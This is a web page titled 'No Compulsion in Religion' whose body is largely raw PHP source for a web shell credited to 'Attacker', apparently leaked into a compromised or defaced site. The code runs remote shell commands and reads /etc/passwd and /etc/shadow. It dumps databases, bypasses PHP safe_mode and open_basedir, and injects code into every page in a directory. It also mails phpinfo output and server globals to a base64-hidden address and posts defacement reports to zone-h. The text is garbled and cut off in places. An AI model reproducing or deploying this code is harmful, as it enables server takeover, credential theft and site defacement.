 |
| |
| |
| |
 |
No Compulsion in Religion |
|
|
';
Developed by Attacker · copyright © & 2010 $v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } }if($auth == 1) {if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="HELLO!"'); header('HTTP/1.0 401 Unauthorized'); exit(" Access Denied"); }} if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) { $tempdir='./'; $select_tempdir = ' ';}else{ if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];} $select_tempdir = $_COOKIE['select_tempdir'];}$head = '';class zipfile{ var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; }}function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } }function moreread($temp){global $lang,$language;$str=''; if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){ if($ffile){ while(!@feof($ffile)){$str .= @fgets($ffile);}; fclose($ffile); } }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){ if($ffile){ $str = @fread($ffile, @filesize($temp)); @fclose($ffile); } }elseif(@function_exists('file')&&($ffiles = @file($temp))){ foreach ($ffiles as $ffile) { $str .= $ffile; } }elseif(@function_exists('file_get_contents')){ $str = @file_get_contents($temp); }elseif(@function_exists('readfile')){ $str = @readfile($temp); }elseif(@function_exists('highlight_file')){ $str = @highlight_file($temp); }elseif(@function_exists('show_source')){ $str = @show_source($temp); }else{echo $lang[$language.'_text56'];}return $str;}function readzlib($filename,$temp=''){global $lang,$language;$str=''; if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; if(@copy("compress.zlib://".$filename, $temp)) { $str = moreread($temp); } else echo $lang[$language.'_text119']; @unlink($temp);return $str;}function morewrite($temp,$str=''){global $lang,$language; if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fwrite($ffile,$str); @fclose($ffile); } }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fputs($ffile,$str); @fclose($ffile); } }elseif(@function_exists('file_put_contents')){ @file_put_contents($temp,$str); }else return 0;return 1;}function mailattach($to,$from,$subj,$attach) { $headers = "From: $from\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name=\"".$attach['name']."\"\r\n"; $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; if(mail($to,$subj,"",$headers)) { return 1; } return 0; }class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!@function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!@function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case 'Oracle': if(!@function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; case 'MySQLi': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysqli_connect')) return 0; $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); if(is_resource($this->connection)) return 1; break; case 'mSQL': if(!@function_exists('msql_connect')) return 0; $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'SQLite': if(!@function_exists('sqlite_open')) return 0; $this->connection = @sqlite_open($this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; case 'MySQLi': return 1; break; case 'mSQL': if(@msql_select_db($this->base,$this->connection)) return 1; break; case 'SQLite': return 1; break; } return 0; } function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error'; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; case 'MySQLi': if(false===($this->res=@mysqli_query($this->connection,$query))) { $this->error = @mysqli_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'mSQL': if(false===($this->res=@msql_query($query,$this->connection))) { $this->error = @msql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'SQLite': if(false===($this->res=@sqlite_query($this->connection,$query))) { $this->error = @sqlite_error_string($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MySQLi': $this->num_rows=@mysqli_num_rows($this->res); $this->num_fields=@mysqli_num_fields($this->res); while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); @mysqli_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'mSQL': $this->num_rows=@msql_num_rows($this->res); $this->num_fields=@msql_num_fields($this->res); while(false !== ($this->rows[] = @msql_fetch_array($this->res))); @msql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'SQLite': $this->num_rows=@sqlite_num_rows($this->res); $this->num_fields=@sqlite_num_fields($this->res); while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'MySQLi': $this->dump[0] = '## MySQLi dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'mSQL': $this->dump[0] = '## mSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'SQLite': $this->dump[0] = '## SQLite dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; case 'MySQLi': @mysqli_close($this->connection); break; case 'mSQL': @msql_close($this->connection); break; case 'SQLite': @sqlite_close($this->connection); break; } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; case 'MySQLi': return @mysqli_affected_rows($this->res); break; case 'mSQL': return @msql_affected_rows($this->res); break; case 'SQLite': return @sqlite_changes($this->res); break; default: return 0; break; break;case 'cURL': if(empty($_POST['Attacker'])){} else {$curl=$_POST['Attacker'];$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);curl_exec($ch);var_dump(curl_exec($ch));echo "";}break;case 'copy':if(empty($snn)){if(empty($_GET['snn'])){if(empty($_POST['snn'])){} else {$u1p=$_POST['snn'];}} else {$u1p=$_GET['snn'];}} $u1p=""; // File to Include... or use _GET _POST$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$snn, $temp)){$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));fclose($zrodlo);echo "".htmlspecialchars($tekst)."";unlink($temp);echo "";}break;case 'ini_restore': if(empty($_POST['ini_restore'])){} else {$ini=$_POST['ini_restore'];echo ini_get("safe_mode");echo ini_get("open_basedir");require_once("$ini");ini_restore("safe_mode");ini_restore("open_basedir");echo ini_get("safe_mode");echo ini_get("open_basedir");include($_GET["egy"]);echo "";}break;case 'glob':function reg_glob(){$chemin=$_REQUEST['glob'];$files = glob("$chemin*");foreach ($files as $filename) { echo "$filename\n";}}if(isset($_REQUEST['glob'])){reg_glob();}break; case 'sym1': if(empty($_POST['sym1p'])){ } else {$symp=$_POST['sym1p']; } if(empty($_POST['sym1p2'])){} else {$symp2=$_POST['sym1p2']; symlink("a/a/a/a/a/a/", "dummy");symlink("dummy".$symp2."".$symp."", "xxx");unlink("dummy");while (1) {symlink(".", "dummy"); } } break; case 'sym2': @include(xxx); break; case 'plugin': if ($_POST['plugin'] ){ for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "\n"; } } echo ""; } } } } if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if($file=moreread($_POST['d_name'])){ $filedump = $file; } else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; } if(!empty($_POST['cmd'])) { @ob_clean(); $filename = @basename($_POST['d_name']); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); } }if(isset($_GET['1'])) { echo @phpinfo(); echo " "; die(); }if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo ''; if(!$sql->connect()) echo " Can't connect to SQL server "; else { if(!empty($sql->base)&&!$sql->select_db()) echo " Can't select database "; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo " Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES).""; switch($sql->query($query)) { case '0': echo " "; break; case '1': if($sql->get_result()) { echo ""; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode(" "; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode(" '; } echo " | ", $sql->columns); echo " | | ".$keys." | | ",$sql->rows[$i]); echo ' | | '.$values.' |
"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo " "; break; } } } } } echo " "; echo " "; die(); }if(isset($_GET['12'])) { @unlink(__FILE__); }if(isset($_GET['11'])) { @unlink($tempdir.'bdpl'); @unlink($tempdir.'back'); @unlink($tempdir.'bd'); @unlink($tempdir.'bd.c'); @unlink($tempdir.'dp'); @unlink($tempdir.'dpc'); @unlink($tempdir.'dpc.c'); @unlink($tempdir.'prxpl'); @unlink($tempdir.'grep.txt'); }if(isset($_GET['2'])){echo $head;function U_value($value) { if ($value == '') return ' no value'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); }function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, ' ', true); return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); }if (@function_exists('ini_get_all')) { $r = ''; echo '', ''; foreach (@ini_get_all() as $key=>$value) { $r .= ''; } echo $r; echo 'Directive | Local Value | Master Value | | '.ws(3).''.$key.' | '.U_value($value['local_value']).' | '.U_value($value['global_value']).' |
'; }echo "
";die();}if(isset($_GET['3'])) { echo $head; echo ''; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '| '.ws(3).''.trim($info[0]).' | '.trim($info[1]).' | | '.ws(3).' --- |
'; echo "
"; die(); }if(isset($_GET['4'])) { echo $head; echo ''; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '| '.ws(3).''.trim($info[0]).' | '.trim($info[1]).' | | '.ws(3).' --- |
'; echo "
"; die(); } if(isset($_GET['tool'])) { echo @phpinfo(); echo "
"; die(); } if(isset($_GET['tools'])) { /*########################################### code 2 ###########################################*/?> ";print"$delmtxt";}function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);$nscmd=htmlspecialchars($scmd);print $nscmd;}elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();print htmlspecialchars($pret);}}function input($type,$name,$value,$size){if (empty($value)){print "";}elseif(empty($name)&∅($size)){print "";}elseif(empty($size)){print "";}else {print "";}}function permcol($path){if (is_writable($path)){print "";callperms($path); print "";}elseif (!is_readable($path)&&!is_writable($path)){print "";callperms($path); print "";}else {print "";callperms($path);}}if ($dlink=="dwld"){download($_REQUEST['dwld']);}function download($dwfile) {$size = filesize($dwfile);@header("Content-Type: application/force-download;name=$dwfile");@header("Content-Transfer-Encoding: binary");@header("Content-Length: $size");@header("Content-Disposition: attachment; filename=$dwfile");@header("Expires: 0");@header("Cache-Control: no-cache, must-revalidate");@header("Pragma: no-cache");@readfile($dwfile); exit;}?>
| Search milw0rm for MD5 hash | Search md5encryption.com for MD5 or SHA1 hash | Search CsTeam for MD5 hash | | | |
";} } else { if (!empty($rndcode)) {echo "Error: incorrect confimation!";} $rnd = rand(0,9).rand(0,9).rand(0,9); echo ""; } } if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "
";}} if ($act == "feedback") { $suppmail = base64_decode("ZWd5X3NwaWRlckBob3RtYWlsLmNvbQ=="); if (!empty($submit)) { $ticket = substr(md5(microtime()+rand(1,1000)),0,6); $body = "Attacker v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\nE-server: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\n\nIP: ".$REMOTE_ADDR; if (!empty($fdbk_ref)) { $tmp = @ob_get_contents(); ob_clean(); phpinfo(); $phpinfo = base64_encode(ob_get_contents()); ob_clean(); echo $tmp; $body .= "\ni"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; } mail($suppmail,"Attacker v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); echo "Thanks for your feedback! Your ticket ID: ".$ticket."."; } else {echo "";} } if ($act == 'massbrowsersploit') {?>Mass Code Injection:
Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.
Edit again] -- [ Curr-Dir ]";die(); }else {print "[ Sorry, Can't create the index !! ] ";die();}}if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){print $sf."
";print "";input ("text","indx","Index-name",35);print " ";input ("submit","qindsub","Create","");print $ef;die();}if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];if (mail($mailto,$subj,$mailtxt)){print "[ Mail sended to $sfnt".$mailto." $efnt successfully ] "; die();}else {print "[ Error, Can't send the mail ] ";die();}} elseif(isset ($mailsub)&∅($mailto)) {print "[ Error, Can't send the mail ] ";die();}if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){print $sf."
";print "";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";input ("submit","mailsub","Send-mail","");print $ef;die();}if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}function callzone($nscdir){if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}fwrite ($fpz,"\$arq = @ARGV[0];\$grupo = @ARGV[1];chomp \$grupo;open(a,\"<\$arq\");@site = ;close(a);\$b = scalar(@site);for(\$a=0;\$a<=\$b;\$a++){chomp \$site[\$a];if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }print \"[+] Sending \$site[\$a]\n\";use IO::Socket::INET;\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";print \$sock \"Accept: */*\r\n\";print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";print \$sock \"Accept-Language: pt-br\r\n\";print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";print \$sock \"Connection: Keep-Alive\r\n\";print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";print \$sock \"Host: old.zone-h.org\r\n\";print \$sock \"Content-Length: 385\r\n\";print \$sock \"Pragma: no-cache\r\n\";print \$sock \"\r\n\";print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\";close(\$sock);}");if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);}else{print "[ Can't complete the operation, try change the current dir with writable one ]
";}$zonet=$_REQUEST['zonet'];if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)){print "[ Can't complete the operation !! ]";}else {callfuncs("chmod 777 $zpl;chmod 777 $li");ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();print " [ All sites should be sended to zone-h.org successfully !! ]";die();}}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){print $sf."
";print " ";input ("text","zonet","Hacker-name",35);print " ";input ("submit","zonesub","Send","");print $ef;die();}print "
";function inisaf($iniv) { $chkini=ini_get($iniv);if(($chkini || strtolower($chkini)) !=='on'){print"OFF ( Not secured )";} else{print"ON ( Secured )";}}function inifunc($inif){$chkin=ini_get($inif);if ($chkin==""){print " None";}else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');while (!feof($opop)){ $nval= fgetc($opop);}}elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}if($nval=$owhich){print"ON";}else{print"OFF";} }print""; echo "
"; die(); } if(isset($_GET['egy'])) { echo $head; echo ''; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '| '.ws(3).''.trim($info[0]).' | '.trim($info[1]).' | | '.ws(3).' |
'; echo "
"; die(); } if(isset($_GET['news'])) { echo $head; echo ''; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '| '.ws(3).''.trim($info[0]).' | '.trim($info[1]).' | | '.ws(3).' |
'; echo "
"; die(); }if(isset($_GET['5'])) {$_POST['cmd'] = 'systeminfo';}if(isset($_GET['6'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}if(isset($_GET['7'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}if(isset($_GET['8'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}if(isset($_GET['9'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}if(isset($_GET['10'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}if(isset($_GET['13'])) {$_ |
|
|
|
|
|